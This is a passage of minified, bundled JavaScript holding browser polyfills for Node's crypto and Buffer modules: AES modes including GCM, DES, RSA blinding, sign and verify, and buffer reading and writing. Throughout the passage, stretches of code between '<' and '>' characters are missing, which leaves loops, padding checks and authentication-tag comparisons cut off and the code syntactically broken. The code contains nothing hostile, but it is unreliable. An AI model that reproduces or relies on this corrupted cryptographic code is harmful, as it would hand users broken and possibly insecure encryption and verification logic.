U(O),O}(this,A,w),this._prev=j.from(A),this._cache=j.allocUnsafe(0),this._secCache=j.allocUnsafe(0),this._decrypt=p,this._alen=0,this._len=0,this._mode=_,this._authTag=null,this._called=!1}ae(b,Q),b.prototype._update=function(_){if(!this._called&&this._alen){var y=16-this._alen%16;y<16&&(y=j.alloc(y,0),this._ghash.update(y))}this._called=!0;var A=this._mode.encrypt(this,_);return this._ghash.update(this._decrypt?_:A),this._len+=_.length,A},b.prototype._final=function(){if(this._decrypt&&!this._authTag)throw new Error("Unsupported state or unable to authenticate data");var _=$(this._ghash.final(8*this._alen,8*this._len),this._cipher.encryptBlock(this._finID));if(this._decrypt&&function E(_,y){var A=0;_.length!==y.length&&A++;for(var p=Math.min(_.length,y.length),D=0;D{var ie=de(1835),j=de(7869),Q=de(4946);we.createCipher=we.Cipher=ie.createCipher,we.createCipheriv=we.Cipheriv=ie.createCipheriv,we.createDecipher=we.Decipher=j.createDecipher,we.createDecipheriv=we.Decipheriv=j.createDecipheriv,we.listCiphers=we.getCiphers=function ae(){return Object.keys(Q)}},7869:(Pe,we,de)=>{var ie=de(4661),j=de(265).Buffer,Q=de(848),ae=de(701),I=de(4003),$=de(5461),U=de(1851);function C(p,D,w){I.call(this),this._cache=new b,this._last=void 0,this._cipher=new $.AES(D),this._prev=j.from(w),this._mode=p,this._autopadding=!0}function b(){this.cache=j.allocUnsafe(0)}function y(p,D,w){var x=Q[p.toLowerCase()];if(!x)throw new TypeError("invalid suite type");if("string"==typeof w&&(w=j.from(w)),"GCM"!==x.mode&&w.length!==x.iv)throw new TypeError("invalid iv length "+w.length);if("string"==typeof D&&(D=j.from(D)),D.length!==x.key/8)throw new TypeError("invalid key length "+D.length);return"stream"===x.type?new ae(x.module,D,w,!0):"auth"===x.type?new ie(x.module,D,w,!0):new C(x.module,D,w)}de(2270)(C,I),C.prototype._update=function(p){this._cache.add(p);for(var D,w,x=[];D=this._cache.get(this._autopadding);)w=this._mode.decrypt(this,D),x.push(w);return j.concat(x)},C.prototype._final=function(){var p=this._cache.flush();if(this._autopadding)return function _(p){var D=p[15];if(D<1||D>16)throw new Error("unable to decrypt data");for(var w=-1;++w16)return D=this.cache.slice(0,16),this.cache=this.cache.slice(16),D}else if(this.cache.length>=16)return D=this.cache.slice(0,16),this.cache=this.cache.slice(16),D;return null},b.prototype.flush=function(){if(this.cache.length)return this.cache},we.createDecipher=function A(p,D){var w=Q[p.toLowerCase()];if(!w)throw new TypeError("invalid suite type");var x=U(D,!1,w.key,w.iv);return y(p,x.key,x.iv)},we.createDecipheriv=y},1835:(Pe,we,de)=>{var ie=de(848),j=de(4661),Q=de(265).Buffer,ae=de(701),I=de(4003),$=de(5461),U=de(1851);function C(p,D,w){I.call(this),this._cache=new _,this._cipher=new $.AES(D),this._prev=Q.from(w),this._mode=p,this._autopadding=!0}de(2270)(C,I),C.prototype._update=function(p){this._cache.add(p);for(var D,w,x=[];D=this._cache.get();)w=this._mode.encrypt(this,D),x.push(w);return Q.concat(x)};var b=Q.alloc(16,16);function _(){this.cache=Q.allocUnsafe(0)}function y(p,D,w){var x=ie[p.toLowerCase()];if(!x)throw new TypeError("invalid suite type");if("string"==typeof D&&(D=Q.from(D)),D.length!==x.key/8)throw new TypeError("invalid key length "+D.length);if("string"==typeof w&&(w=Q.from(w)),"GCM"!==x.mode&&w.length!==x.iv)throw new TypeError("invalid iv length "+w.length);return"stream"===x.type?new ae(x.module,D,w):"auth"===x.type?new j(x.module,D,w):new C(x.module,D,w)}C.prototype._final=function(){var p=this._cache.flush();if(this._autopadding)return p=this._mode.encrypt(this,p),this._cipher.scrub(),p;if(!p.equals(b))throw this._cipher.scrub(),new Error("data not multiple of block length")},C.prototype.setAutoPadding=function(p){return this._autopadding=!!p,this},_.prototype.add=function(p){this.cache=Q.concat([this.cache,p])},_.prototype.get=function(){if(this.cache.length>15){var p=this.cache.slice(0,16);return this.cache=this.cache.slice(16),p}return null},_.prototype.flush=function(){for(var p=16-this.cache.length,D=Q.allocUnsafe(p),w=-1;++w{var ie=de(265).Buffer,j=ie.alloc(16,0);function ae($){var U=ie.allocUnsafe(16);return U.writeUInt32BE($[0]>>>0,0),U.writeUInt32BE($[1]>>>0,4),U.writeUInt32BE($[2]>>>0,8),U.writeUInt32BE($[3]>>>0,12),U}function I($){this.h=$,this.state=ie.alloc(16,0),this.cache=ie.allocUnsafe(0)}I.prototype.ghash=function($){for(var U=-1;++U<$.length;)this.state[U]^=$[U];this._multiply()},I.prototype._multiply=function(){for(var E,b,$=function Q($){return[$.readUInt32BE(0),$.readUInt32BE(4),$.readUInt32BE(8),$.readUInt32BE(12)]}(this.h),U=[0,0,0,0],_=-1;++_<128;){for(0!=(this.state[~~(_/8)]&1<<7-_%8)&&(U[0]^=$[0],U[1]^=$[1],U[2]^=$[2],U[3]^=$[3]),b=0!=(1&$[3]),E=3;E>0;E--)$[E]=$[E]>>>1|(1&$[E-1])<<31;$[0]=$[0]>>>1,b&&($[0]=$[0]^225<<24)}this.state=ae(U)},I.prototype.update=function($){this.cache=ie.concat([this.cache,$]);for(var U;this.cache.length>=16;)U=this.cache.slice(0,16),this.cache=this.cache.slice(16),this.ghash(U)},I.prototype.final=function($,U){return this.cache.length&&this.ghash(ie.concat([this.cache,j],16)),this.ghash(ae([0,$,0,U])),this.state},Pe.exports=I},7841:Pe=>{Pe.exports=function we(de){for(var j,ie=de.length;ie--;){if(255!==(j=de.readUInt8(ie))){j++,de.writeUInt8(j,ie);break}de.writeUInt8(0,ie)}}},3e3:(Pe,we,de)=>{var ie=de(7110);we.encrypt=function(j,Q){var ae=ie(Q,j._prev);return j._prev=j._cipher.encryptBlock(ae),j._prev},we.decrypt=function(j,Q){var ae=j._prev;j._prev=Q;var I=j._cipher.decryptBlock(Q);return ie(I,ae)}},9415:(Pe,we,de)=>{var ie=de(265).Buffer,j=de(7110);function Q(ae,I,$){var U=I.length,E=j(I,ae._cache);return ae._cache=ae._cache.slice(U),ae._prev=ie.concat([ae._prev,$?I:E]),E}we.encrypt=function(ae,I,$){for(var E,U=ie.allocUnsafe(0);I.length;){if(0===ae._cache.length&&(ae._cache=ae._cipher.encryptBlock(ae._prev),ae._prev=ie.allocUnsafe(0)),!(ae._cache.length<=I.length)){U=ie.concat([U,Q(ae,I,$)]);break}U=ie.concat([U,Q(ae,I.slice(0,E=ae._cache.length),$)]),I=I.slice(E)}return U}},6616:(Pe,we,de)=>{var ie=de(265).Buffer;function j(ae,I,$){for(var _,y,E=-1,b=0;++E<8;)b+=(128&(y=ae._cipher.encryptBlock(ae._prev)[0]^(_=I&1<<7-E?128:0)))>>E%8,ae._prev=Q(ae._prev,$?_:y);return b}function Q(ae,I){var $=ae.length,U=-1,E=ie.allocUnsafe(ae.length);for(ae=ie.concat([ae,ie.from([I])]);++U<$;)E[U]=ae[U]<<1|ae[U+1]>>7;return E}we.encrypt=function(ae,I,$){for(var U=I.length,E=ie.allocUnsafe(U),C=-1;++C{var ie=de(265).Buffer;function j(Q,ae,I){var U=Q._cipher.encryptBlock(Q._prev)[0]^ae;return Q._prev=ie.concat([Q._prev.slice(1),ie.from([I?ae:U])]),U}we.encrypt=function(Q,ae,I){for(var $=ae.length,U=ie.allocUnsafe($),E=-1;++E<$;)U[E]=j(Q,ae[E],I);return U}},6735:(Pe,we,de)=>{var ie=de(7110),j=de(265).Buffer,Q=de(7841);function ae($){var U=$._cipher.encryptBlockRaw($._prev);return Q($._prev),U}we.encrypt=function($,U){var E=Math.ceil(U.length/16),C=$._cache.length;$._cache=j.concat([$._cache,j.allocUnsafe(16*E)]);for(var b=0;b{we.encrypt=function(de,ie){return de._cipher.encryptBlock(ie)},we.decrypt=function(de,ie){return de._cipher.decryptBlock(ie)}},848:(Pe,we,de)=>{var ie={ECB:de(8564),CBC:de(3e3),CFB:de(9415),CFB8:de(5927),CFB1:de(6616),OFB:de(5651),CTR:de(6735),GCM:de(6735)},j=de(4946);for(var Q in j)j[Q].module=ie[j[Q].mode];Pe.exports=j},5651:(Pe,we,de)=>{var ie=de(5449).Buffer,j=de(7110);function Q(ae){return ae._prev=ae._cipher.encryptBlock(ae._prev),ae._prev}we.encrypt=function(ae,I){for(;ae._cache.length{var ie=de(5461),j=de(265).Buffer,Q=de(4003);function I($,U,E,C){Q.call(this),this._cipher=new ie.AES(U),this._prev=j.from(E),this._cache=j.allocUnsafe(0),this._secCache=j.allocUnsafe(0),this._decrypt=C,this._mode=$}de(2270)(I,Q),I.prototype._update=function($){return this._mode.encrypt(this,$,this._decrypt)},I.prototype._final=function(){this._cipher.scrub()},Pe.exports=I},4271:(Pe,we,de)=>{var ie=de(928),j=de(8931),Q=de(848),ae=de(8156),I=de(1851);function E(_,y,A){if(_=_.toLowerCase(),Q[_])return j.createCipheriv(_,y,A);if(ae[_])return new ie({key:y,iv:A,mode:_});throw new TypeError("invalid suite type")}function C(_,y,A){if(_=_.toLowerCase(),Q[_])return j.createDecipheriv(_,y,A);if(ae[_])return new ie({key:y,iv:A,mode:_,decrypt:!0});throw new TypeError("invalid suite type")}we.createCipher=we.Cipher=function $(_,y){var A,p;if(_=_.toLowerCase(),Q[_])A=Q[_].key,p=Q[_].iv;else{if(!ae[_])throw new TypeError("invalid suite type");A=8*ae[_].key,p=ae[_].iv}var D=I(y,!1,A,p);return E(_,D.key,D.iv)},we.createCipheriv=we.Cipheriv=E,we.createDecipher=we.Decipher=function U(_,y){var A,p;if(_=_.toLowerCase(),Q[_])A=Q[_].key,p=Q[_].iv;else{if(!ae[_])throw new TypeError("invalid suite type");A=8*ae[_].key,p=ae[_].iv}var D=I(y,!1,A,p);return C(_,D.key,D.iv)},we.createDecipheriv=we.Decipheriv=C,we.listCiphers=we.getCiphers=function b(){return Object.keys(ae).concat(j.getCiphers())}},928:(Pe,we,de)=>{var ie=de(4003),j=de(1462),Q=de(2270),ae=de(265).Buffer,I={"des-ede3-cbc":j.CBC.instantiate(j.EDE),"des-ede3":j.EDE,"des-ede-cbc":j.CBC.instantiate(j.EDE),"des-ede":j.EDE,"des-cbc":j.CBC.instantiate(j.DES),"des-ecb":j.DES};function $(U){ie.call(this);var b,E=U.mode.toLowerCase(),C=I[E];b=U.decrypt?"decrypt":"encrypt";var _=U.key;ae.isBuffer(_)||(_=ae.from(_)),("des-ede"===E||"des-ede-cbc"===E)&&(_=ae.concat([_,_.slice(0,8)]));var y=U.iv;ae.isBuffer(y)||(y=ae.from(y)),this._des=C.create({key:_,iv:y,type:b})}I.des=I["des-cbc"],I.des3=I["des-ede3-cbc"],Pe.exports=$,Q($,ie),$.prototype._update=function(U){return ae.from(this._des.update(U))},$.prototype._final=function(){return ae.from(this._des.final())}},8156:(Pe,we)=>{we["des-ecb"]={key:8,iv:0},we["des-cbc"]=we.des={key:8,iv:8},we["des-ede3-cbc"]=we.des3={key:24,iv:8},we["des-ede3"]={key:24,iv:0},we["des-ede-cbc"]={key:16,iv:8},we["des-ede"]={key:16,iv:0}},2005:(Pe,we,de)=>{var ie=de(5449).Buffer,j=de(9423),Q=de(2419);function I(U){var C,E=U.modulus.byteLength();do{C=new j(Q(E))}while(C.cmp(U.modulus)>=0||!C.umod(U.prime1)||!C.umod(U.prime2));return C}function $(U,E){var C=function ae(U){var E=I(U);return{blinder:E.toRed(j.mont(U.modulus)).redPow(new j(U.publicExponent)).fromRed(),unblinder:E.invm(U.modulus)}}(E),b=E.modulus.byteLength(),_=new j(U).mul(C.blinder).umod(E.modulus),y=_.toRed(j.mont(E.prime1)),A=_.toRed(j.mont(E.prime2)),p=E.coefficient,D=E.prime1,w=E.prime2,x=y.redPow(E.exponent1).fromRed(),S=A.redPow(E.exponent2).fromRed(),O=x.isub(S).imul(p).umod(D).imul(w);return S.iadd(O).imul(C.unblinder).umod(E.modulus).toArrayLike(ie,"be",b)}$.getr=I,Pe.exports=$},2196:(Pe,we,de)=>{"use strict";Pe.exports=de(5207)},9494:(Pe,we,de)=>{"use strict";var ie=de(265).Buffer,j=de(2161),Q=de(4539),ae=de(2270),I=de(2378),$=de(1926),U=de(5207);function E(y){Q.Writable.call(this);var A=U[y];if(!A)throw new Error("Unknown message digest");this._hashType=A.hash,this._hash=j(A.hash),this._tag=A.id,this._signType=A.sign}function C(y){Q.Writable.call(this);var A=U[y];if(!A)throw new Error("Unknown message digest");this._hash=j(A.hash),this._tag=A.id,this._signType=A.sign}function b(y){return new E(y)}function _(y){return new C(y)}Object.keys(U).forEach(function(y){U[y].id=ie.from(U[y].id,"hex"),U[y.toLowerCase()]=U[y]}),ae(E,Q.Writable),E.prototype._write=function(A,p,D){this._hash.update(A),D()},E.prototype.update=function(A,p){return this._hash.update("string"==typeof A?ie.from(A,p):A),this},E.prototype.sign=function(A,p){this.end();var D=this._hash.digest(),w=I(D,A,this._hashType,this._signType,this._tag);return p?w.toString(p):w},ae(C,Q.Writable),C.prototype._write=function(A,p,D){this._hash.update(A),D()},C.prototype.update=function(A,p){return this._hash.update("string"==typeof A?ie.from(A,p):A),this},C.prototype.verify=function(A,p,D){var w="string"==typeof p?ie.from(p,D):p;this.end();var x=this._hash.digest();return $(w,x,A,this._signType,this._tag)},Pe.exports={Sign:b,Verify:_,createSign:b,createVerify:_}},2378:(Pe,we,de)=>{"use strict";var ie=de(265).Buffer,j=de(4295),Q=de(2005),ae=de(1875).ec,I=de(9423),$=de(3262),U=de(1308);function A(S,O,B,K){if((S=ie.from(S.toArray())).length0&&B.ishrn(K),B}function w(S,O,B){var K,ee;do{for(K=ie.alloc(0);8*K.length{"use strict";var ie=de(265).Buffer,j=de(9423),Q=de(1875).ec,ae=de(3262),I=de(1308);function C(b,_){if(b.cmpn(0)<=0)throw new Error("invalid sig");if(b.cmp(_)>=0)throw new Error("invalid sig")}Pe.exports=function $(b,_,y,A,p){var D=ae(y);if("ec"===D.type){if("ecdsa"!==A&&"ecdsa/rsa"!==A)throw new Error("wrong public key type");return function U(b,_,y){var A=I[y.data.algorithm.curve.join(".")];if(!A)throw new Error("unknown curve "+y.data.algorithm.curve.join("."));return new Q(A).verify(_,b,y.data.subjectPrivateKey.data)}(b,_,D)}if("dsa"===D.type){if("dsa"!==A)throw new Error("wrong public key type");return function E(b,_,y){var A=y.data.p,p=y.data.q,D=y.data.g,w=y.data.pub_key,x=ae.signature.decode(b,"der"),S=x.s,O=x.r;C(S,p),C(O,p);var B=j.mont(A),K=S.invm(p);return 0===D.toRed(B).redPow(new j(_).mul(K).mod(p)).fromRed().mul(w.toRed(B).redPow(O.mul(K).mod(p)).fromRed()).mod(A).mod(p).cmp(O)}(b,_,D)}if("rsa"!==A&&"ecdsa/rsa"!==A)throw new Error("wrong public key type");_=ie.concat([p,_]);for(var w=D.modulus.byteLength(),x=[1],S=0;_.length+x.length+2{var ie=de(5449).Buffer;Pe.exports=function(Q,ae){for(var I=Math.min(Q.length,ae.length),$=new ie(I),U=0;U{"use strict";const ie=de(9742),j=de(4794),Q="function"==typeof Symbol&&"function"==typeof Symbol.for?Symbol.for("nodejs.util.inspect.custom"):null;we.Buffer=U,we.SlowBuffer=function S(Oe){return+Oe!=Oe&&(Oe=0),U.alloc(+Oe)},we.INSPECT_MAX_BYTES=50;const ae=2147483647;function $(Oe){if(Oe>ae)throw new RangeError('The value "'+Oe+'" is invalid for option "size"');const Te=new Uint8Array(Oe);return Object.setPrototypeOf(Te,U.prototype),Te}function U(Oe,Te,Le){if("number"==typeof Oe){if("string"==typeof Te)throw new TypeError('The "string" argument must be of type string. Received type number');return _(Oe)}return E(Oe,Te,Le)}function E(Oe,Te,Le){if("string"==typeof Oe)return function y(Oe,Te){if(("string"!=typeof Te||""===Te)&&(Te="utf8"),!U.isEncoding(Te))throw new TypeError("Unknown encoding: "+Te);const Le=0|O(Oe,Te);let $e=$(Le);const st=$e.write(Oe,Te);return st!==Le&&($e=$e.slice(0,st)),$e}(Oe,Te);if(ArrayBuffer.isView(Oe))return function p(Oe){if(lt(Oe,Uint8Array)){const Te=new Uint8Array(Oe);return D(Te.buffer,Te.byteOffset,Te.byteLength)}return A(Oe)}(Oe);if(null==Oe)throw new TypeError("The first argument must be one of type string, Buffer, ArrayBuffer, Array, or Array-like Object. Received type "+typeof Oe);if(lt(Oe,ArrayBuffer)||Oe&<(Oe.buffer,ArrayBuffer)||"undefined"!=typeof SharedArrayBuffer&&(lt(Oe,SharedArrayBuffer)||Oe&<(Oe.buffer,SharedArrayBuffer)))return D(Oe,Te,Le);if("number"==typeof Oe)throw new TypeError('The "value" argument must not be of type number. Received type number');const $e=Oe.valueOf&&Oe.valueOf();if(null!=$e&&$e!==Oe)return U.from($e,Te,Le);const st=function w(Oe){if(U.isBuffer(Oe)){const Te=0|x(Oe.length),Le=$(Te);return 0===Le.length||Oe.copy(Le,0,0,Te),Le}return void 0!==Oe.length?"number"!=typeof Oe.length||ft(Oe.length)?$(0):A(Oe):"Buffer"===Oe.type&&Array.isArray(Oe.data)?A(Oe.data):void 0}(Oe);if(st)return st;if("undefined"!=typeof Symbol&&null!=Symbol.toPrimitive&&"function"==typeof Oe[Symbol.toPrimitive])return U.from(Oe[Symbol.toPrimitive]("string"),Te,Le);throw new TypeError("The first argument must be one of type string, Buffer, ArrayBuffer, Array, or Array-like Object. Received type "+typeof Oe)}function C(Oe){if("number"!=typeof Oe)throw new TypeError('"size" argument must be of type number');if(Oe<0)throw new RangeError('The value "'+Oe+'" is invalid for option "size"')}function _(Oe){return C(Oe),$(Oe<0?0:0|x(Oe))}function A(Oe){const Te=Oe.length<0?0:0|x(Oe.length),Le=$(Te);for(let $e=0;$e=ae)throw new RangeError("Attempt to allocate Buffer larger than maximum size: 0x"+ae.toString(16)+" bytes");return 0|Oe}function O(Oe,Te){if(U.isBuffer(Oe))return Oe.length;if(ArrayBuffer.isView(Oe)||lt(Oe,ArrayBuffer))return Oe.byteLength;if("string"!=typeof Oe)throw new TypeError('The "string" argument must be one of type string, Buffer, or ArrayBuffer. Received type '+typeof Oe);const Le=Oe.length,$e=arguments.length>2&&!0===arguments[2];if(!$e&&0===Le)return 0;let st=!1;for(;;)switch(Te){case"ascii":case"latin1":case"binary":return Le;case"utf8":case"utf-8":return rt(Oe).length;case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return 2*Le;case"hex":return Le>>>1;case"base64":return ht(Oe).length;default:if(st)return $e?-1:rt(Oe).length;Te=(""+Te).toLowerCase(),st=!0}}function B(Oe,Te,Le){let $e=!1;if((void 0===Te||Te<0)&&(Te=0),Te>this.length||((void 0===Le||Le>this.length)&&(Le=this.length),Le<=0)||(Le>>>=0)<=(Te>>>=0))return"";for(Oe||(Oe="utf8");;)switch(Oe){case"hex":return L(this,Te,Le);case"utf8":case"utf-8":return v(this,Te,Le);case"ascii":return G(this,Te,Le);case"latin1":case"binary":return X(this,Te,Le);case"base64":return f(this,Te,Le);case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return h(this,Te,Le);default:if($e)throw new TypeError("Unknown encoding: "+Oe);Oe=(Oe+"").toLowerCase(),$e=!0}}function K(Oe,Te,Le){const $e=Oe[Te];Oe[Te]=Oe[Le],Oe[Le]=$e}function ee(Oe,Te,Le,$e,st){if(0===Oe.length)return-1;if("string"==typeof Le?($e=Le,Le=0):Le>2147483647?Le=2147483647:Le<-2147483648&&(Le=-2147483648),ft(Le=+Le)&&(Le=st?0:Oe.length-1),Le<0&&(Le=Oe.length+Le),Le>=Oe.length){if(st)return-1;Le=Oe.length-1}else if(Le<0){if(!st)return-1;Le=0}if("string"==typeof Te&&(Te=U.from(Te,$e)),U.isBuffer(Te))return 0===Te.length?-1:se(Oe,Te,Le,$e,st);if("number"==typeof Te)return Te&=255,"function"==typeof Uint8Array.prototype.indexOf?st?Uint8Array.prototype.indexOf.call(Oe,Te,Le):Uint8Array.prototype.lastIndexOf.call(Oe,Te,Le):se(Oe,[Te],Le,$e,st);throw new TypeError("val must be string, number or Buffer")}function se(Oe,Te,Le,$e,st){let Ft,xt=1,pt=Oe.length,vt=Te.length;if(void 0!==$e&&("ucs2"===($e=String($e).toLowerCase())||"ucs-2"===$e||"utf16le"===$e||"utf-16le"===$e)){if(Oe.length<2||Te.length<2)return-1;xt=2,pt/=2,vt/=2,Le/=2}function Wi(zt,pa){return 1===xt?zt[pa]:zt.readUInt16BE(pa*xt)}if(st){let zt=-1;for(Ft=Le;Ftpt&&(Le=pt-vt),Ft=Le;Ft>=0;Ft--){let zt=!0;for(let pa=0;past&&($e=st):$e=st;const xt=Te.length;let pt;for($e>xt/2&&($e=xt/2),pt=0;pt<$e;++pt){const vt=parseInt(Te.substr(2*pt,2),16);if(ft(vt))return pt;Oe[Le+pt]=vt}return pt}function le(Oe,Te,Le,$e){return mt(rt(Te,Oe.length-Le),Oe,Le,$e)}function ye(Oe,Te,Le,$e){return mt(function Ge(Oe){const Te=[];for(let Le=0;Le>8,st=Le%256,xt.push(st),xt.push($e);return xt}(Te,Oe.length-Le),Oe,Le,$e)}function f(Oe,Te,Le){return ie.fromByteArray(0===Te&&Le===Oe.length?Oe:Oe.slice(Te,Le))}function v(Oe,Te,Le){Le=Math.min(Oe.length,Le);const $e=[];let st=Te;for(;st239?4:xt>223?3:xt>191?2:1;if(st+vt<=Le){let Wi,Ft,zt,pa;switch(vt){case 1:xt<128&&(pt=xt);break;case 2:Wi=Oe[st+1],128==(192&Wi)&&(pa=(31&xt)<<6|63&Wi,pa>127&&(pt=pa));break;case 3:Wi=Oe[st+1],Ft=Oe[st+2],128==(192&Wi)&&128==(192&Ft)&&(pa=(15&xt)<<12|(63&Wi)<<6|63&Ft,pa>2047&&(pa<55296||pa>57343)&&(pt=pa));break;case 4:Wi=Oe[st+1],Ft=Oe[st+2],zt=Oe[st+3],128==(192&Wi)&&128==(192&Ft)&&128==(192&zt)&&(pa=(15&xt)<<18|(63&Wi)<<12|(63&Ft)<<6|63&zt,pa>65535&&pa<1114112&&(pt=pa))}}null===pt?(pt=65533,vt=1):pt>65535&&(pt-=65536,$e.push(pt>>>10&1023|55296),pt=56320|1023&pt),$e.push(pt),st+=vt}return function P(Oe){const Te=Oe.length;if(Te<=M)return String.fromCharCode.apply(String,Oe);let Le="",$e=0;for(;$est.length?(U.isBuffer(pt)||(pt=U.from(pt)),pt.copy(st,xt)):Uint8Array.prototype.set.call(st,pt,xt);else{if(!U.isBuffer(pt))throw new TypeError('"list" argument must be an Array of Buffers');pt.copy(st,xt)}xt+=pt.length}return st},U.byteLength=O,U.prototype._isBuffer=!0,U.prototype.swap16=function(){const Te=this.length;if(Te%2!=0)throw new RangeError("Buffer size must be a multiple of 16-bits");for(let Le=0;LeLe&&(Te+=" ... "),""},Q&&(U.prototype[Q]=U.prototype.inspect),U.prototype.compare=function(Te,Le,$e,st,xt){if(lt(Te,Uint8Array)&&(Te=U.from(Te,Te.offset,Te.byteLength)),!U.isBuffer(Te))throw new TypeError('The "target" argument must be one of type Buffer or Uint8Array. Received type '+typeof Te);if(void 0===Le&&(Le=0),void 0===$e&&($e=Te?Te.length:0),void 0===st&&(st=0),void 0===xt&&(xt=this.length),Le<0||$e>Te.length||st<0||xt>this.length)throw new RangeError("out of range index");if(st>=xt&&Le>=$e)return 0;if(st>=xt)return-1;if(Le>=$e)return 1;if(this===Te)return 0;let pt=(xt>>>=0)-(st>>>=0),vt=($e>>>=0)-(Le>>>=0);const Wi=Math.min(pt,vt),Ft=this.slice(st,xt),zt=Te.slice(Le,$e);for(let pa=0;pa>>=0,isFinite($e)?($e>>>=0,void 0===st&&(st="utf8")):(st=$e,$e=void 0)}const xt=this.length-Le;if((void 0===$e||$e>xt)&&($e=xt),Te.length>0&&($e<0||Le<0)||Le>this.length)throw new RangeError("Attempt to write outside buffer bounds");st||(st="utf8");let pt=!1;for(;;)switch(st){case"hex":return ve(this,Te,Le,$e);case"utf8":case"utf-8":return le(this,Te,Le,$e);case"ascii":case"latin1":case"binary":return ye(this,Te,Le,$e);case"base64":return z(this,Te,Le,$e);case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return l(this,Te,Le,$e);default:if(pt)throw new TypeError("Unknown encoding: "+st);st=(""+st).toLowerCase(),pt=!0}},U.prototype.toJSON=function(){return{type:"Buffer",data:Array.prototype.slice.call(this._arr||this,0)}};const M=4096;function G(Oe,Te,Le){let $e="";Le=Math.min(Oe.length,Le);for(let st=Te;st$e)&&(Le=$e);let st="";for(let xt=Te;xtLe)throw new RangeError("Trying to access beyond buffer length")}function J(Oe,Te,Le,$e,st,xt){if(!U.isBuffer(Oe))throw new TypeError('"buffer" argument must be a Buffer instance');if(Te>st||TeOe.length)throw new RangeError("Index out of range")}function Z(Oe,Te,Le,$e,st){De(Te,$e,st,Oe,Le,7);let xt=Number(Te&BigInt(4294967295));Oe[Le++]=xt,xt>>=8,Oe[Le++]=xt,xt>>=8,Oe[Le++]=xt,xt>>=8,Oe[Le++]=xt;let pt=Number(Te>>BigInt(32)&BigInt(4294967295));return Oe[Le++]=pt,pt>>=8,Oe[Le++]=pt,pt>>=8,Oe[Le++]=pt,pt>>=8,Oe[Le++]=pt,Le}function ue(Oe,Te,Le,$e,st){De(Te,$e,st,Oe,Le,7);let xt=Number(Te&BigInt(4294967295));Oe[Le+7]=xt,xt>>=8,Oe[Le+6]=xt,xt>>=8,Oe[Le+5]=xt,xt>>=8,Oe[Le+4]=xt;let pt=Number(Te>>BigInt(32)&BigInt(4294967295));return Oe[Le+3]=pt,pt>>=8,Oe[Le+2]=pt,pt>>=8,Oe[Le+1]=pt,pt>>=8,Oe[Le]=pt,Le+8}function Ie(Oe,Te,Le,$e,st,xt){if(Le+$e>Oe.length)throw new RangeError("Index out of range");if(Le<0)throw new RangeError("Index out of range")}function Ae(Oe,Te,Le,$e,st){return Te=+Te,Le>>>=0,st||Ie(Oe,0,Le,4),j.write(Oe,Te,Le,$e,23,4),Le+4}function Ue(Oe,Te,Le,$e,st){return Te=+Te,Le>>>=0,st||Ie(Oe,0,Le,8),j.write(Oe,Te,Le,$e,52,8),Le+8}U.prototype.slice=function(Te,Le){const $e=this.length;(Te=~~Te)<0?(Te+=$e)<0&&(Te=0):Te>$e&&(Te=$e),(Le=void 0===Le?$e:~~Le)<0?(Le+=$e)<0&&(Le=0):Le>$e&&(Le=$e),Le>>=0,Le>>>=0,$e||R(Te,Le,this.length);let st=this[Te],xt=1,pt=0;for(;++pt>>=0,Le>>>=0,$e||R(Te,Le,this.length);let st=this[Te+--Le],xt=1;for(;Le>0&&(xt*=256);)st+=this[Te+--Le]*xt;return st},U.prototype.readUint8=U.prototype.readUInt8=function(Te,Le){return Te>>>=0,Le||R(Te,1,this.length),this[Te]},U.prototype.readUint16LE=U.prototype.readUInt16LE=function(Te,Le){return Te>>>=0,Le||R(Te,2,this.length),this[Te]|this[Te+1]<<8},U.prototype.readUint16BE=U.prototype.readUInt16BE=function(Te,Le){return Te>>>=0,Le||R(Te,2,this.length),this[Te]<<8|this[Te+1]},U.prototype.readUint32LE=U.prototype.readUInt32LE=function(Te,Le){return Te>>>=0,Le||R(Te,4,this.length),(this[Te]|this[Te+1]<<8|this[Te+2]<<16)+16777216*this[Te+3]},U.prototype.readUint32BE=U.prototype.readUInt32BE=function(Te,Le){return Te>>>=0,Le||R(Te,4,this.length),16777216*this[Te]+(this[Te+1]<<16|this[Te+2]<<8|this[Te+3])},U.prototype.readBigUInt64LE=We(function(Te){Ve(Te>>>=0,"offset");const Le=this[Te],$e=this[Te+7];(void 0===Le||void 0===$e)&&ze(Te,this.length-8);const st=Le+this[++Te]*Lo(2,8)+this[++Te]*Lo(2,16)+this[++Te]*Lo(2,24),xt=this[++Te]+this[++Te]*Lo(2,8)+this[++Te]*Lo(2,16)+$e*Lo(2,24);return BigInt(st)+(BigInt(xt)<>>=0,"offset");const Le=this[Te],$e=this[Te+7];(void 0===Le||void 0===$e)&&ze(Te,this.length-8);const st=Le*Lo(2,24)+this[++Te]*Lo(2,16)+this[++Te]*Lo(2,8)+this[++Te],xt=this[++Te]*Lo(2,24)+this[++Te]*Lo(2,16)+this[++Te]*Lo(2,8)+$e;return(BigInt(st)<>>=0,Le>>>=0,$e||R(Te,Le,this.length);let st=this[Te],xt=1,pt=0;for(;++pt=xt&&(st-=Math.pow(2,8*Le)),st},U.prototype.readIntBE=function(Te,Le,$e){Te>>>=0,Le>>>=0,$e||R(Te,Le,this.length);let st=Le,xt=1,pt=this[Te+--st];for(;st>0&&(xt*=256);)pt+=this[Te+--st]*xt;return xt*=128,pt>=xt&&(pt-=Math.pow(2,8*Le)),pt},U.prototype.readInt8=function(Te,Le){return Te>>>=0,Le||R(Te,1,this.length),128&this[Te]?-1*(255-this[Te]+1):this[Te]},U.prototype.readInt16LE=function(Te,Le){Te>>>=0,Le||R(Te,2,this.length);const $e=this[Te]|this[Te+1]<<8;return 32768&$e?4294901760|$e:$e},U.prototype.readInt16BE=function(Te,Le){Te>>>=0,Le||R(Te,2,this.length);const $e=this[Te+1]|this[Te]<<8;return 32768&$e?4294901760|$e:$e},U.prototype.readInt32LE=function(Te,Le){return Te>>>=0,Le||R(Te,4,this.length),this[Te]|this[Te+1]<<8|this[Te+2]<<16|this[Te+3]<<24},U.prototype.readInt32BE=function(Te,Le){return Te>>>=0,Le||R(Te,4,this.length),this[Te]<<24|this[Te+1]<<16|this[Te+2]<<8|this[Te+3]},U.prototype.readBigInt64LE=We(function(Te){Ve(Te>>>=0,"offset");const Le=this[Te],$e=this[Te+7];(void 0===Le||void 0===$e)&&ze(Te,this.length-8);const st=this[Te+4]+this[Te+5]*Lo(2,8)+this[Te+6]*Lo(2,16)+($e<<24);return(BigInt(st)<>>=0,"offset");const Le=this[Te],$e=this[Te+7];(void 0===Le||void 